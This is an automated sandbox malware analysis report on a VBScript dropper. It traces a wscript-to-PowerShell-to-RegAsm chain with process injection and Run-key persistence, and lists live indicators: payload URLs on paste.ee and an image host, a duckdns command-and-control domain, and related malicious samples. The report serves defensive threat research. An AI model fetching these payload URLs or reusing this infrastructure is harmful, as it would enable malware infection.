            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1430116 Sample: 72625413524.vbs Startdate: 23/04/2024 Architecture: WINDOWS Score: 100 34 aprilxrwonew8450.duckdns.org 2->34 36 paste.ee 2->36 38 2 other IPs or domains 2->38 54 Snort IDS alert for network traffic 2->54 56 Multi AV Scanner detection for domain / URL 2->56 58 Found malware configuration 2->58 64 12 other signatures 2->64 10 wscript.exe 14 2->10         started        14 wscript.exe 2->14         started        16 wscript.exe 2->16         started        signatures3 60 Uses dynamic DNS services 34->60 62 Connects to a pastebin service (likely for C&C) 36->62 process4 dnsIp5 44 paste.ee 172.67.187.200, 443, 49728 CLOUDFLARENETUS United States 10->44 74 System process connects to network (likely due to code injection or exploit) 10->74 76 VBScript performs obfuscated calls to suspicious functions 10->76 78 Suspicious powershell command line found 10->78 82 4 other signatures 10->82 18 powershell.exe 7 10->18         started        80 Windows Scripting host queries suspicious COM object (likely to drop second stage) 14->80 signatures6 process7 signatures8 48 Suspicious powershell command line found 18->48 50 Suspicious execution chain found 18->50 52 Found suspicious powershell code related to unpacking or dynamic code loading 18->52 21 powershell.exe 15 16 18->21         started        25 conhost.exe 18->25         started        process9 dnsIp10 40 pantherropes.com 116.206.104.215, 443, 49732 PUBLIC-DOMAIN-REGISTRYUS Seychelles 21->40 42 uploaddeimagens.com.br 172.67.215.45, 443, 49729, 49731 CLOUDFLARENETUS United States 21->42 66 Suspicious powershell command line found 21->66 68 Creates autostart registry keys with suspicious values (likely registry only malware) 21->68 70 Writes to foreign memory regions 21->70 72 Injects a PE file into a foreign processes 21->72 27 RegAsm.exe 3 21->27         started        30 powershell.exe 12 21->30         started        signatures11 process12 dnsIp13 46 aprilxrwonew8450.duckdns.org 134.255.217.251, 49735, 8450 ACTIVE-SERVERSactive-serverscomDE Germany 27->46 32 conhost.exe 30->32         started        process14

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            72625413524.vbs11%ReversingLabsScript-WScript.Trojan.Heuristic
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            pantherropes.com4%VirustotalBrowse
            uploaddeimagens.com.br7%VirustotalBrowse
            SourceDetectionScannerLabelLink
            http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://oneget.orgX0%URL Reputationsafe
            https://oneget.org0%URL Reputationsafe
            https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?171339482013%VirustotalBrowse
            https://lesferch.github.io/DesktopPic0%VirustotalBrowse
            NameIPActiveMaliciousAntivirus DetectionReputation
            pantherropes.com
            116.206.104.215
            truetrueunknown
            aprilxrwonew8450.duckdns.org
            134.255.217.251
            truetrue
              unknown
              paste.ee
              172.67.187.200
              truefalse
                high
                uploaddeimagens.com.br
                172.67.215.45
                truetrueunknown
                NameMaliciousAntivirus DetectionReputation
                https://pantherropes.com/error/xwapri.txttrue
                  unknown
                  aprilxrwonew8450.duckdns.orgtrue
                    unknown
                    https://paste.ee/d/FIwXafalse
                      high
                      https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820trueunknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.2353488546.000001C1BDC2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2333958982.000001C1AF55C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2353488546.000001C1BDD64000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000005.00000002.2333958982.000001C1AF03C000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.2333958982.000001C1ADDDC000.00000004.00000800.00020000.00000000.sdmptrue
                          • URL Reputation: malware
                          unknown
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.2333958982.000001C1ADDDC000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://contoso.com/Licensepowershell.exe, 00000005.00000002.2353488546.000001C1BDD64000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://www.google.com;wscript.exe, 00000000.00000003.2232630314.000002CC1EC1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2234289094.000002CC1EC05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236247073.000002CC1CB88000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236937839.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmpfalse
                              low
                              https://contoso.com/Iconpowershell.exe, 00000005.00000002.2353488546.000001C1BDD64000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://analytics.paste.eewscript.exe, 00000000.00000003.2232630314.000002CC1EC1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2234289094.000002CC1EC05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236247073.000002CC1CB88000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236937839.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://aka.ms/pscore6powershell.exe, 00000002.00000002.2921006320.000002209C8CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://paste.ee/d/FIwXaUwscript.exe, 00000000.00000002.2236893994.000002CC1EC19000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2232885652.000002CC1EC11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2232905254.000002CC1EC18000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233299190.000002CC1EC19000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.2333958982.000001C1ADDDC000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://www.google.comwscript.exe, 00000000.00000003.2232630314.000002CC1EC1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2234289094.000002CC1EC05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236937839.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://lesferch.github.io/DesktopPicwscript.exe, 00000000.00000003.2226569396.000002CC1EA0A000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                        https://contoso.com/powershell.exe, 00000005.00000002.2353488546.000001C1BDD64000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.2353488546.000001C1BDC2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2333958982.000001C1AF55C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2353488546.000001C1BDD64000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://oneget.orgXpowershell.exe, 00000005.00000002.2333958982.000001C1AF03C000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://paste.ee/wscript.exe, 00000000.00000003.2233340297.000002CC1EC50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2232630314.000002CC1EC50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236937839.000002CC1EC50000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://analytics.paste.ee;wscript.exe, 00000000.00000003.2232630314.000002CC1EC1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2234289094.000002CC1EC05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236937839.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmpfalse
                                              low
                                              https://cdnjs.cloudflare.comwscript.exe, 00000000.00000003.2232630314.000002CC1EC1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2234289094.000002CC1EC05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236937839.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://aka.ms/pscore68powershell.exe, 00000002.00000002.2921006320.000002209C906000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2910379828.000002793BDE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2333958982.000001C1ADBB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://cdnjs.cloudflare.com;wscript.exe, 00000000.00000003.2232630314.000002CC1EC1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2234289094.000002CC1EC05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236247073.000002CC1CB88000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236937839.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    low
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2921006320.000002209C91A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2333958982.000001C1ADBB1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.3520703529.0000000002C01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://secure.gravatar.comwscript.exe, 00000000.00000003.2232630314.000002CC1EC1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2234289094.000002CC1EC05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236247073.000002CC1CB88000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236937839.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://themes.googleusercontent.comwscript.exe, 00000000.00000003.2232630314.000002CC1EC1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2234289094.000002CC1EC05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236247073.000002CC1CB88000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236937839.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://oneget.orgpowershell.exe, 00000005.00000002.2333958982.000001C1AF03C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://paste.ee/d/FIwXaokwscript.exe, 00000000.00000003.2235638255.000002CC1EC5D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2232630314.000002CC1EC50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236999970.000002CC1EC5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs
                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            172.67.187.200
                                                            paste.eeUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            134.255.217.251
                                                            aprilxrwonew8450.duckdns.orgGermany
                                                            197071ACTIVE-SERVERSactive-serverscomDEtrue
                                                            116.206.104.215
                                                            pantherropes.comSeychelles
                                                            394695PUBLIC-DOMAIN-REGISTRYUStrue
                                                            172.67.215.45
                                                            uploaddeimagens.com.brUnited States
                                                            13335CLOUDFLARENETUStrue
                                                            Joe Sandbox version:40.0.0 Tourmaline
                                                            Analysis ID:1430116
                                                            Start date and time:2024-04-23 07:52:11 +02:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 7m 37s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:12
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:72625413524.vbs
                                                            Detection:MAL
                                                            Classification:mal100.spre.troj.expl.evad.winVBS@13/10@8/4
                                                            EGA Information:
                                                            • Successful, ratio: 33.3%
                                                            HCA Information:
                                                            • Successful, ratio: 100%
                                                            • Number of executed functions: 22
                                                            • Number of non-executed functions: 2
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .vbs
                                                            • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                            • Execution Graph export aborted for target powershell.exe, PID 3140 because it is empty
                                                            • Execution Graph export aborted for target powershell.exe, PID 6528 because it is empty
                                                            • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            TimeTypeDescription
                                                            07:53:25API Interceptor42x Sleep call for process: powershell.exe modified
                                                            07:53:32AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\Name_File.vbs
                                                            07:53:35API Interceptor2115766x Sleep call for process: RegAsm.exe modified
                                                            07:53:41AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\Name_File.vbs
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            172.67.187.200EWW.vbsGet hashmaliciousUnknownBrowse
                                                            • paste.ee/d/gFlKP
                                                            ODC#PO 4500628950098574654323567875765674433##633.xla.xlsxGet hashmaliciousUnknownBrowse
                                                            • paste.ee/d/JxxYu
                                                            Purchase Order PO0193832.vbsGet hashmaliciousUnknownBrowse
                                                            • paste.ee/d/Bpplq
                                                            Name.vbsGet hashmaliciousUnknownBrowse
                                                            • paste.ee/d/0kkOm
                                                            517209487.vbsGet hashmaliciousXWormBrowse
                                                            • paste.ee/d/s0kJG
                                                            screen_shots.vbsGet hashmaliciousXWormBrowse
                                                            • paste.ee/d/GoCAw
                                                            66432890.vbsGet hashmaliciousUnknownBrowse
                                                            • paste.ee/d/D6Uw6
                                                            96874650.vbsGet hashmaliciousXWormBrowse
                                                            • paste.ee/d/yj4hE
                                                            1e#U041e.vbsGet hashmaliciousAgentTeslaBrowse
                                                            • paste.ee/d/QkK2f
                                                            751652433.vbsGet hashmaliciousXWormBrowse
                                                            • paste.ee/d/0BSaJ
                                                            116.206.104.215F723838674.vbsGet hashmaliciousRemcosBrowse
                                                              F873635427.vbsGet hashmaliciousRemcos, XWormBrowse
                                                                F873635427.vbsGet hashmaliciousRemcos, XWormBrowse
                                                                  http://padmavathitravels.comGet hashmaliciousUnknownBrowse
                                                                    172.67.215.45Purchase Inquiry.vbsGet hashmaliciousAgentTeslaBrowse
                                                                      SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtfGet hashmaliciousRemcosBrowse
                                                                        Invoice No. 03182024.docxGet hashmaliciousRemcosBrowse
                                                                          Payment Advice for Invoice 2024 0904.vbsGet hashmaliciousFormBookBrowse
                                                                            TNT Invoicing_pdf.vbsGet hashmaliciousFormBookBrowse
                                                                              DHL Shipping Documents_pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                P.O.109961.xlsGet hashmaliciousRemcosBrowse
                                                                                  SecuriteInfo.com.Exploit.ShellCode.69.24616.9282.rtfGet hashmaliciousRemcosBrowse
                                                                                    SOA APR24.xlsGet hashmaliciousRemcosBrowse
                                                                                      2Qvb8zqdPF.rtfGet hashmaliciousRemcosBrowse
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        paste.eebZA95up38s.rtfGet hashmaliciousAgentTeslaBrowse
                                                                                        • 104.21.84.67
                                                                                        mWimHae6l9.exeGet hashmaliciousUnknownBrowse
                                                                                        • 172.67.187.200
                                                                                        UmJMWJPQ9h.exeGet hashmaliciousXWormBrowse
                                                                                        • 172.67.187.200
                                                                                        GPgMeqI8Gy.exeGet hashmaliciousXWormBrowse
                                                                                        • 104.21.84.67
                                                                                        E3XzKxHCCb.exeGet hashmaliciousXWormBrowse
                                                                                        • 172.67.187.200
                                                                                        mWimHae6l9.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.21.84.67
                                                                                        UmJMWJPQ9h.exeGet hashmaliciousXWormBrowse
                                                                                        • 104.21.84.67
                                                                                        GPgMeqI8Gy.exeGet hashmaliciousXWormBrowse
                                                                                        • 104.21.84.67
                                                                                        E3XzKxHCCb.exeGet hashmaliciousXWormBrowse
                                                                                        • 172.67.187.200
                                                                                        SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtfGet hashmaliciousRemcosBrowse
                                                                                        • 172.67.187.200
                                                                                        pantherropes.comF723838674.vbsGet hashmaliciousRemcosBrowse
                                                                                        • 116.206.104.215
                                                                                        F873635427.vbsGet hashmaliciousRemcos, XWormBrowse
                                                                                        • 116.206.104.215
                                                                                        F873635427.vbsGet hashmaliciousRemcos, XWormBrowse
                                                                                        • 116.206.104.215
                                                                                        uploaddeimagens.com.brPurchase Inquiry.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                        • 172.67.215.45
                                                                                        bZA95up38s.rtfGet hashmaliciousAgentTeslaBrowse
                                                                                        • 104.21.45.138
                                                                                        SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtfGet hashmaliciousRemcosBrowse
                                                                                        • 172.67.215.45
                                                                                        SecuriteInfo.com.Win32.SuspectCrc.28876.20318.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                        • 104.21.45.138
                                                                                        Invoice No. 03182024.docxGet hashmaliciousRemcosBrowse
                                                                                        • 172.67.215.45
                                                                                        eInvoicing_pdf.vbsGet hashmaliciousFormBookBrowse
                                                                                        • 104.21.45.138
                                                                                        F723838674.vbsGet hashmaliciousUnknownBrowse
                                                                                        • 104.21.45.138
                                                                                        Signed Proforma Invoice 3645479_pdf.vbsGet hashmaliciousFormBookBrowse
                                                                                        • 104.21.45.138
                                                                                        F723838674.vbsGet hashmaliciousRemcosBrowse
                                                                                        • 104.21.45.138
                                                                                        DHL Receipt_pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                        • 104.21.45.138
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        PUBLIC-DOMAIN-REGISTRYUSHDPESDR11OD5606METERS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 208.91.199.224
                                                                                        SecuriteInfo.com.MSIL.Kryptik.AGUH.tr.13955.20631.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 162.215.248.214
                                                                                        HDPESDR1145-6METERS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 208.91.199.224
                                                                                        TT copy of the first payment.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 208.91.199.224
                                                                                        8xFzJWrEIa.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, VidarBrowse
                                                                                        • 111.118.215.174
                                                                                        Scan Copy 0092316282.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 162.215.248.214
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 216.10.247.145
                                                                                        rTDN001-180424_PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                        • 208.91.199.224
                                                                                        1iO53raUh69l6nV.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 208.91.199.224
                                                                                        INVOICE pdf.wsfGet hashmaliciousGuLoaderBrowse
                                                                                        • 216.10.249.248
                                                                                        ACTIVE-SERVERSactive-serverscomDEft1i6jvAdD.exeGet hashmaliciousXmrigBrowse
                                                                                        • 134.255.231.136
                                                                                        huhu.mips.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                        • 95.156.228.183
                                                                                        1B8943B2CCEA3EE9E464B5865711DB721BAE33CA03646.exeGet hashmaliciousBazaLoader, SmokeLoaderBrowse
                                                                                        • 134.255.232.95
                                                                                        Summaryform_XsssmAVjTv.wsfGet hashmaliciousAsyncRAT, zgRATBrowse
                                                                                        • 134.255.225.46
                                                                                        http://vps-zap756882-1.zap-srv.comGet hashmaliciousUnknownBrowse
                                                                                        • 134.255.234.208
                                                                                        3fB3EuUEe7.exeGet hashmaliciousQuasarBrowse
                                                                                        • 134.255.254.225
                                                                                        dl2.exeGet hashmaliciousUnknownBrowse
                                                                                        • 31.214.240.203
                                                                                        mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                        • 95.156.228.199
                                                                                        KY40Vey3Ml.elfGet hashmaliciousMiraiBrowse
                                                                                        • 95.156.228.196
                                                                                        file.exeGet hashmaliciousQuasarBrowse
                                                                                        • 134.255.254.134
                                                                                        CLOUDFLARENETUSPurchase Inquiry.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                        • 172.67.215.45
                                                                                        ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.docGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 172.67.134.136
                                                                                        https://universewild.orgGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                        • 104.17.2.184
                                                                                        https://url.avanan.click/v2/___https:/novafr-my.sharepoint.com/:b:/g/personal/mfranco_nova-fr_org/EZPaIwPkDApNno6rWIAO20YB4ByiRCAe_VGScx-2iiONBw?e=magUuY/___.YXAzOmVuLW1kYTphOm86ZDA4MDI5MGVhZTA1MzJiMWZlYTg0YjE1OWE2NmVhNjc6NjplYTNkOjc2NzNkYWE0NTMzNWVhMjkxM2VjMGU1NGMyNDY3ZjVhNmJhNjU0MTk1ZmRjMzUzM2QxODAyNDVjY2E1Y2M1ODY6aDpUGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 104.17.2.184
                                                                                        http://myidealwedding.com.auGet hashmaliciousBitRAT, HTMLPhisherBrowse
                                                                                        • 104.17.25.14
                                                                                        QUOTE RNP002673CC1F68.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 172.67.74.152
                                                                                        https://netorg64799-my.sharepoint.com/:b:/g/personal/alva_wct-usa_com/ES73RZgSrIxGsn3-WRolkh4BarUkUa8B7jWUjl7sJYhzog?e=uQClH3Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                        • 104.17.2.184
                                                                                        szamla_sorszam_8472.xlsmGet hashmaliciousUnknownBrowse
                                                                                        • 104.17.24.14
                                                                                        https://pub-187b2d91c0494f3ba5ec3b326cc8fed8.r2.dev/baeleavemail.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 104.18.2.35
                                                                                        szamla_sorszam_8472.xlsmGet hashmaliciousUnknownBrowse
                                                                                        • 104.17.25.14
                                                                                        CLOUDFLARENETUSPurchase Inquiry.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                        • 172.67.215.45
                                                                                        ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.docGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 172.67.134.136
                                                                                        https://universewild.orgGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                        • 104.17.2.184
                                                                                        https://url.avanan.click/v2/___https:/novafr-my.sharepoint.com/:b:/g/personal/mfranco_nova-fr_org/EZPaIwPkDApNno6rWIAO20YB4ByiRCAe_VGScx-2iiONBw?e=magUuY/___.YXAzOmVuLW1kYTphOm86ZDA4MDI5MGVhZTA1MzJiMWZlYTg0YjE1OWE2NmVhNjc6NjplYTNkOjc2NzNkYWE0NTMzNWVhMjkxM2VjMGU1NGMyNDY3ZjVhNmJhNjU0MTk1ZmRjMzUzM2QxODAyNDVjY2E1Y2M1ODY6aDpUGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 104.17.2.184
                                                                                        http://myidealwedding.com.auGet hashmaliciousBitRAT, HTMLPhisherBrowse
                                                                                        • 104.17.25.14
                                                                                        QUOTE RNP002673CC1F68.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 172.67.74.152
                                                                                        https://netorg64799-my.sharepoint.com/:b:/g/personal/alva_wct-usa_com/ES73RZgSrIxGsn3-WRolkh4BarUkUa8B7jWUjl7sJYhzog?e=uQClH3Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                        • 104.17.2.184
                                                                                        szamla_sorszam_8472.xlsmGet hashmaliciousUnknownBrowse
                                                                                        • 104.17.24.14
                                                                                        https://pub-187b2d91c0494f3ba5ec3b326cc8fed8.r2.dev/baeleavemail.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 104.18.2.35
                                                                                        szamla_sorszam_8472.xlsmGet hashmaliciousUnknownBrowse
                                                                                        • 104.17.25.14
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        3b5074b1b5d032e5620f69f9f700ff0ePurchase Inquiry.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                        • 172.67.215.45
                                                                                        • 116.206.104.215
                                                                                        Shipping Document_PDF.vbsGet hashmaliciousUnknownBrowse
                                                                                        • 172.67.215.45
                                                                                        • 116.206.104.215
                                                                                        BitTorrent-7.6.exeGet hashmaliciousUnknownBrowse
                                                                                        • 172.67.215.45
                                                                                        • 116.206.104.215
                                                                                        BitTorrent-7.6.exeGet hashmaliciousUnknownBrowse
                                                                                        • 172.67.215.45
                                                                                        • 116.206.104.215
                                                                                        QUOTE RNP002673CC1F68.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 172.67.215.45
                                                                                        • 116.206.104.215
                                                                                        scripttodo.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 172.67.215.45
                                                                                        • 116.206.104.215
                                                                                        https://secure.rightsignature.com/signers/72685de1-0891-4676-ba51-0639e8aac386/sign?identity_token=e9BkbAE3-a65UvyeRkxLGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 172.67.215.45
                                                                                        • 116.206.104.215
                                                                                        FreeTemplates_46070101.msiGet hashmaliciousUnknownBrowse
                                                                                        • 172.67.215.45
                                                                                        • 116.206.104.215
                                                                                        z1E-catalogSamples.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 172.67.215.45
                                                                                        • 116.206.104.215
                                                                                        rPayment_AdviceJ001222042024.batGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                        • 172.67.215.45
                                                                                        • 116.206.104.215
                                                                                        37f463bf4616ecd445d4a1937da06e19Purchase Inquiry.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                        • 172.67.187.200
                                                                                        232_786.msiGet hashmaliciousUnknownBrowse
                                                                                        • 172.67.187.200
                                                                                        file.exeGet hashmaliciousVidarBrowse
                                                                                        • 172.67.187.200
                                                                                        file.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                        • 172.67.187.200
                                                                                        FINAL CMR.-Transportauftrag Nachlauf new.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                        • 172.67.187.200
                                                                                        CE1KVxYp5t.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                        • 172.67.187.200
                                                                                        Ve6VeFSgkz.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                        • 172.67.187.200
                                                                                        FreeTemplates_46070101.msiGet hashmaliciousUnknownBrowse
                                                                                        • 172.67.187.200
                                                                                        rPayment_AdviceJ001222042024.batGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                        • 172.67.187.200
                                                                                        FreeTemplates_46069972.msiGet hashmaliciousUnknownBrowse
                                                                                        • 172.67.187.200
                                                                                        No context
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):204074
                                                                                        Entropy (8bit):5.16860231694857
                                                                                        Encrypted:false
